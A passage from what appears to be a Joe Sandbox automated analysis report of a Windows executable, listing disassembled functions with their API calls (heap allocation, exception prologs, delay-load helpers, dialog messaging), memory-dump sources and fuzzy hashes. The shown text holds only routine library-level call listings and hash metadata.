                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free
                                                                                      • String ID:
                                                                                      • API String ID: 614378929-0
                                                                                      • Opcode ID: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                      • Instruction ID: 2bfb6329fcfc7299872fca5c737d92466d341a04e44d64144f012734144121b2
                                                                                      • Opcode Fuzzy Hash: ffe7a698f1ec9d313924040038d8a651e71016dbf9af90b8887af046bf84921e
                                                                                      • Instruction Fuzzy Hash: 370149723013556BE721CF69E881D5EFBE9EB85370F66062EE18483280EB34AC45C778
                                                                                      Function 00425A8D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0042634D,00000001,00000364,?,00422213,?,?,0043CBE8), ref: 00425ACE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 3dbeef2a9b4cc1a2410459d38877982229f9a48bd877d0357e574972e8413ddd
                                                                                      • Instruction ID: abb8bc203ac073c7e9a9f4121bfb31c9852aee6e500fe6c4ccec24ab4ba93edd
                                                                                      • Opcode Fuzzy Hash: 3dbeef2a9b4cc1a2410459d38877982229f9a48bd877d0357e574972e8413ddd
                                                                                      • Instruction Fuzzy Hash: 01F0B431701E306ADB216B23BD87B5B3758EF81761F984227F819D6690CA78DC0186ED
                                                                                      Function 004259FC Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000000,?,?,?,004223AA,?,0000015D,?,?,?,?,00422F29,000000FF,00000000,?,?), ref: 00425A2E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap
                                                                                      • String ID:
                                                                                      • API String ID: 1279760036-0
                                                                                      • Opcode ID: 698dc16daf4de740024d650acdf0c23e886e09e3adcc5b064b64719c5812390d
                                                                                      • Instruction ID: 193a09e99a823dc9f5ed50a7790da7e9af240f2ff9c1813c472600489ddbe92e
                                                                                      • Opcode Fuzzy Hash: 698dc16daf4de740024d650acdf0c23e886e09e3adcc5b064b64719c5812390d
                                                                                      • Instruction Fuzzy Hash: 37E06531301A306BE6313B66BC4775B7648AF513A9F954327AC1696691DB7CCC0141AD
                                                                                      Function 00405B35 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00405B3A
                                                                                        • Part of subcall function 0040AC66: __EH_prolog.LIBCMT ref: 0040AC6B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: b2d203d5d9bb0afb54967f970ac4d14708f46cbac61f2b33956734aadbf31f7a
                                                                                      • Instruction ID: 03d483851eda3f5c3b18e65868f844c0f664e5856fcedb49f3d645a8770d5f5f
                                                                                      • Opcode Fuzzy Hash: b2d203d5d9bb0afb54967f970ac4d14708f46cbac61f2b33956734aadbf31f7a
                                                                                      • Instruction Fuzzy Hash: B701A230904684DAD714EBA4D4553DDF7E49F55308F0080BFA86923282CBB82B08D766
                                                                                      Function 0040A145 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0040A174
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseFind
                                                                                      • String ID:
                                                                                      • API String ID: 1863332320-0
                                                                                      • Opcode ID: 6e037bec7c8faf0fa4471394a06cd2b555b7003f221a13a620d25ceb633e770a
                                                                                      • Instruction ID: 342afe23466f2a0cf8b4910bae50f53806f2c7d9b3a92f135e198fdb4c20c535
                                                                                      • Opcode Fuzzy Hash: 6e037bec7c8faf0fa4471394a06cd2b555b7003f221a13a620d25ceb633e770a
                                                                                      • Instruction Fuzzy Hash: 14F0E931408380EECE225BB48805BCB7B915F16335F048A5FF1FD262D2C27D5895972B
                                                                                      Function 00401E8E Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00401E93
                                                                                        • Part of subcall function 004018F6: __EH_prolog.LIBCMT ref: 004018FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: f4b95f795a4a9e7bb1fa40c164edd87f2d664019cfc0e9f8fc997cb520b003b7
                                                                                      • Instruction ID: 4a9958e207991fd40c09fc0f131d62f11409f7dfcc7952c7cfdd1f353044b825
                                                                                      • Opcode Fuzzy Hash: f4b95f795a4a9e7bb1fa40c164edd87f2d664019cfc0e9f8fc997cb520b003b7
                                                                                      • Instruction Fuzzy Hash: 10F0D4B1D002998ECF40EFA8D8456EEBBF1AB18304F0441BFD409E7252E73846058B95
                                                                                      Function 00401E93 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • __EH_prolog.LIBCMT ref: 00401E93
                                                                                        • Part of subcall function 004018F6: __EH_prolog.LIBCMT ref: 004018FB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: H_prolog
                                                                                      • String ID:
                                                                                      • API String ID: 3519838083-0
                                                                                      • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                      • Instruction ID: fc545afdcc2d5595fc623333c6e9a4a0b399b63869f817c8b8636fdb1a20c923
                                                                                      • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                      • Instruction Fuzzy Hash: BFF07FB2C012999ECB41EFA8C8456EEBBF1AB18304F1442BFD409E7252E73956458B95
                                                                                      Function 0040F8F2 Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetThreadExecutionState.KERNEL32(00000001), ref: 0040F927
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExecutionStateThread
                                                                                      • String ID:
                                                                                      • API String ID: 2211380416-0
                                                                                      • Opcode ID: ae1f3963e6b1fb02d305bb5c20d36188ed614cd8fa2ae4ae82c96e9da6e8852f
                                                                                      • Instruction ID: f14aebff4213777597030cc17468544ce580a3d290c2bab53f4215503aec6059
                                                                                      • Opcode Fuzzy Hash: ae1f3963e6b1fb02d305bb5c20d36188ed614cd8fa2ae4ae82c96e9da6e8852f
                                                                                      • Instruction Fuzzy Hash: BAD05BA171411122D62533297946BFE16074FC6329F09007FF105777E38AAD08EA93FD
                                                                                      Function 00418B65 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GdipAlloc.GDIPLUS(00000010), ref: 00418B6B
                                                                                        • Part of subcall function 00418924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00418945
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                      • String ID:
                                                                                      • API String ID: 1915507550-0
                                                                                      • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                      • Instruction ID: 22dbae5cb2bccb8ae91eae4281d64495397cca47ac01393667193f501e6bcfb8
                                                                                      • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                      • Instruction Fuzzy Hash: 17D0A77068420C7BDF406E619C039FE7BD9DB02350F00413FBC0495250EE76DD916256
                                                                                      Function 0040971A Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetFileType.KERNELBASE(000000FF,0040964C), ref: 00409726
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileType
                                                                                      • String ID:
                                                                                      • API String ID: 3081899298-0
                                                                                      • Opcode ID: 0bf330125303400f6aa970cbe79ad5123578d3629e26b68cee1d2b661a685368
                                                                                      • Instruction ID: 7756fcc8eb2cbe293b70b8e07ba3f2af52ff5630e9bc92dca2b9110403948da2
                                                                                      • Opcode Fuzzy Hash: 0bf330125303400f6aa970cbe79ad5123578d3629e26b68cee1d2b661a685368
                                                                                      • Instruction Fuzzy Hash: A1D01232031200D6CE650E385D5906B67619B433A6B28DBF5E165D61E2C73ACC43F544
                                                                                      Function 0041BF77 Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0041BF9C
                                                                                        • Part of subcall function 0041991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0041992F
                                                                                        • Part of subcall function 0041991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00419940
                                                                                        • Part of subcall function 0041991E: TranslateMessage.USER32(?), ref: 0041994A
                                                                                        • Part of subcall function 0041991E: DispatchMessageW.USER32(?), ref: 00419954
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: Message$DispatchItemPeekSendTranslate
                                                                                      • String ID:
                                                                                      • API String ID: 4142818094-0
                                                                                      • Opcode ID: 058fe8c3ed59c6e804a8e6da93f56236a4d00919e972209302c2a246216dec53
                                                                                      • Instruction ID: 6694a9e13021fa16f72761a3ac7553495a04df7914dd59ae4170b1c122a82a64
                                                                                      • Opcode Fuzzy Hash: 058fe8c3ed59c6e804a8e6da93f56236a4d00919e972209302c2a246216dec53
                                                                                      • Instruction Fuzzy Hash: 50D09E71154200EAD6112B52CE06F0ABAE2BB88B08F404969B344340F186A2AD70AB0A
                                                                                      Function 0041C741 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 88df826a45575121b540eb717351e1fee102ec83756e016d2bf5ce04d1084e7a
                                                                                      • Instruction ID: 63e005d469a065c47907b09b2ade9d2a5d9053baa51f9462ebc6f40ac8ce5a70
                                                                                      • Opcode Fuzzy Hash: 88df826a45575121b540eb717351e1fee102ec83756e016d2bf5ce04d1084e7a
                                                                                      • Instruction Fuzzy Hash: CCB012B22F81026C3145E1455E42F77410CC4C8B14730A16FF411C01C0E98C4C85513F
                                                                                      Function 0041C74B Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: 40736aeca112c40ab21c59bd4f9606c31593084328c7714ddb3d7506300ef73c
                                                                                      • Instruction ID: e749206741baff539bdd797a1ff1825779db1143be32ea385d64bf0d216f3d9d
                                                                                      • Opcode Fuzzy Hash: 40736aeca112c40ab21c59bd4f9606c31593084328c7714ddb3d7506300ef73c
                                                                                      • Instruction Fuzzy Hash: B9B012B22F82026C3145E1051E86F77410CC4C8B14730E06FF810C01D0E98C0D85453F
                                                                                      Function 0041C75F Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: b4cbd39b6faf8869fab96b6a0f701f5987d476b5a1dbc26995264d832de23cd5
                                                                                      • Instruction ID: 8244c7749e0280cc3110225dc13449be0c2e44eed30eb9a05292fcc7612dcce0
                                                                                      • Opcode Fuzzy Hash: b4cbd39b6faf8869fab96b6a0f701f5987d476b5a1dbc26995264d832de23cd5
                                                                                      • Instruction Fuzzy Hash: 3DB012B22E83026D3145E1052F82F77410CC4C8B14730A06FF410C01D0E98C0D86453F
                                                                                      Function 0041C726 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C738
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: c4c3c450b166bf85861d48c244dc7f4c57e632522d1baaa3483efa039292fb97
                                                                                      • Instruction ID: 8b4ae4442e35ba2134765d50433ada996e5ded6699bb98c069e8a83cfac8ba25
                                                                                      • Opcode Fuzzy Hash: c4c3c450b166bf85861d48c244dc7f4c57e632522d1baaa3483efa039292fb97
                                                                                      • Instruction Fuzzy Hash: 75B012B22E83027C3505A1411EC2F77410CC4C8B24730A16FF410D40D0E98C1DC5853F
                                                                                      Function 0041C7C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                      Similarity
                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                      • String ID:
                                                                                      • API String ID: 1269201914-0
                                                                                      • Opcode ID: d7c9e9d272cf00cf9fcb546564cf1119eba8d07c7cd01be01ab9384109328d36
                                                                                      • Instruction ID: 920766836ea6c1434ddafe65991cbb681c17adda6885b5eeb8bc3faf71867e3e
                                                                                      • Opcode Fuzzy Hash: d7c9e9d272cf00cf9fcb546564cf1119eba8d07c7cd01be01ab9384109328d36
                                                                                      • Instruction Fuzzy Hash: 84B012B12DC1026D3144D1462D42F77410DC4C8B24730D01FF440C1181E9CC1CDA443F
                                                                                      Function 0041C787 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 0041C799
                                                                                        • Part of subcall function 0041CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0041CB39
                                                                                        • Part of subcall function 0041CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0041CB4A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1732151798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1732056692.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732507356.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732599422.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1732687223.000000000045C000.00000002.00000001.01000000.00000003.sdmpDownload File
